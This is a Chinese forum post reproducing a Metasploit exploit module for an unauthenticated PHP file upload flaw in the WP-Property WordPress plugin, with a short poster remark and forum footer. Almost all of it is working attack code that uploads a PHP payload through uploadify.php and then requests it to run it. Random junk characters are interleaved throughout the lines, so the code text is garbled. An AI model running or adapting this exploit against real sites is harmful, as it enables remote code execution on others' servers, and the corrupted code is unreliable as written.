WordPress WP-Property PHP 文件上传漏洞
* U- p, Y6 P; @1 O+ T
; U7 C2 s+ O+ Z' [ ## # This file is part of the Metasploit Framework and may be subject to! k2 i6 ~& a8 n( D" n# C, ?1 z0 T
$ E9 o9 i, r3 y7 C0 _' M
# redistribution and commercial restrictions. Please see the Metasploit$ x7 U8 x; Q0 [* `( A$ J
& Q. c$ z3 i5 a- }% v7 J
# Framework web site for more information on licensing and terms of use.
( r7 Y' I0 I/ E; Y/ n9 y- w8 d% H& z5 w" E" {6 E3 _% q7 Q
# http://metasploit.com/framework/ ##
# B2 I3 Q( y+ V- i9 p c, P
. F/ _ W2 f* Y! V5 a 8 F- w: X8 J! }2 p9 W6 F
: D' ^5 J% T+ q0 d U) r+ C! a) j/ W # p* } t. j: E' |0 M
6 I7 w2 }2 G" s' W& w' Srequire 'msf/core'
. B: B. Y5 d4 c/ t6 v/ grequire 'msf/core/exploit/php_exe') E* B' G {0 J; e9 y. g
# M& m2 X) M1 [/ cclass Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit: hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',
- Y: h4 s& }4 d- O8 A% \'Description' => %q{- K8 o: g* p9 o, o* W
This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' =>
' _" E& O0 d3 a3 I4 h[
: `# ~6 N) }! C, g* M0 ]'Sammy FORGIT', # initial discovery! c5 W* B! @- Z0 D
'James Fitts <fitts.james[at]gmail.com>' # metasploit module
) X; |! V2 {9 k2 M) s],
4 n3 h( x6 W' L: Y/ {'License' => MSF_LICENSE,
. z! Y- G) O* X$ s/ {; c \- _! C'References' =>
1 g( L8 i! N* Q6 T: }: Z# ][
$ j% G/ j D* o# N- }& F+ Y3 D8 B[ 'OSVDB', '82656' ],
/ S3 B C' l2 U Z5 \: @[ 'BID', '53787' ],
$ p$ a' ]- W. |$ D[ 'EDB', '18987'],
* k& n, |+ z R5 t[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]/ u) F) d/ `# ?* k' {* t9 T/ n
],
, ~! I% o8 |! P& e: p" Q; e; m'Payload' =>9 v' D* k6 j& k" A/ c
{0 O2 J: ^4 o! t+ p+ L! E
'BadChars' => "\x00", }, A3 ~; G: T1 `$ @6 t
},5 y0 P6 P6 O( r4 |
'Platform' => 'php',1 q2 A- V, i. O& V7 _/ m
'Arch' => ARCH_PHP,2 k6 E. }3 @5 l* w) y f8 n
'Targets' =>
/ E) U6 N& E# {, |/ }[
6 |* c3 _" u: L- x) ~[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
3 N+ }: Q0 ?: e[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]$ }7 C3 b. ~: P( J: E
],
7 }+ b' ?7 v+ B. \3 n c'DefaultTarget' => 0,) i A" W" y% j8 O: ?7 ~
'DisclosureDate' => 'Mar 26 2012')). g8 K5 ^, F$ D r
* ~, v+ \- j! E
register_options(: z( m5 |- i; d" \9 `7 {+ h$ ?- a. ]
[
" |; E! @) w* S3 _: j* w' e m/ [OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])( s$ ?+ O8 c7 O& t1 I8 i
], self.class)( b' s2 c3 Z* s
end
$ S! P @3 \+ d$ x" d$ S, X5 [0 w O
2 U* D# u, Z4 }" o# ~& X5 U0 g; V" tdef check
. q8 Y; h1 k: \4 I. e4 v2 zuri = target_uri.path
% g- o- {+ o& S/ huri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET',
) r8 f/ F1 X) ?' Z O0 q6 m'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"4 y' r! S9 L/ b& \: L) h
}). ]. |8 K f# j# e N& v. X% b% L
2 }; |! X& U* e9 G/ o4 ]. T0 rif not res or res.code != 200
! n" v7 C0 N; Y& E4 |return Exploit::CheckCode::Unknown
/ M6 A3 f. v( F- S2 e+ Dend6 O! [, [9 k8 |; D: O7 T6 R8 ?6 i/ @
/ l- F/ b, |6 T' Z9 u
return Exploit::CheckCode::Appears
6 k5 I0 f( n6 V& send7 d, z; v8 c. E% \7 p
9 ^; j U; Y) P: \' edef exploit
& K1 r6 |0 @ K) zuri = target_uri.path
/ r' N4 S. j9 r+ a! }+ Yuri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true)( L9 R! K9 U3 M! `7 O
) m* Z t7 x! `* ^: ^7 s( E
data = Rex::MIME::Message.new
' ^! d5 y$ v& d0 L6 vdata.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")' H2 ^8 b3 U- N
data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")+ G$ r. P' o: \
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')9 D! }" V/ C/ [- {7 a& X6 w
0 { g* P4 u; ]$ U# \7 l! Nprint_status("#{peer} - Uploading payload #{@payload_name}")
# z% J0 X5 G/ Q4 u$ {0 \" e1 Tres = send_request_cgi({
& B" G, [- ?. o( r$ h'method' => 'POST',( R( G& D1 Z+ t: Y: S# P
'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
) Q" w1 O) G. X, r: R4 ]/ E'ctype' => "multipart/form-data; boundary=#{data.bound}",
; [' n. W6 o5 l) u& m7 \$ ^6 a'data' => post_data
9 W( M6 x# `. w: j6 X% g, j})* a1 @* j5 S8 f* F
6 [+ P/ s: a& y! }/ Nif not res or res.code != 200 or res.body !~ /#{@payload_name}/
9 |" T+ ~: s! q: c- Gfail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")$ Z4 o' d# `2 }: c( \
end- \3 w: |6 [% {6 a- y" C6 f, [
7 n. ` b: M/ J' ]7 U6 X
upload_uri = res.body5 |' W0 P. G6 H/ `) f
1 C, ~2 z3 I9 D$ rprint_status("#{peer} - Executing payload #{@payload_name}")
; I$ y" O! ~- f7 E: {" Nres = send_request_raw({
! P- @; U3 V9 G4 o'uri' => upload_uri,
- k8 a+ S M$ v h'method' => 'GET'
8 e1 C$ K: g: u2 A$ f3 n- |})
, i! I9 P* w7 B" I9 Hend% X3 o7 s- l2 ~6 \
end
' |3 d9 i V$ Y& w$ F* k D' R9 _7 q% W2 T; U6 |+ [' ?
不要问我这写的是什么 怎么利用 我是说msf.
8 C4 [- q" c g
0 H* \, Y* ~. F/ p |
发表于 2013-1-4 19:51:30
收藏
支持
反对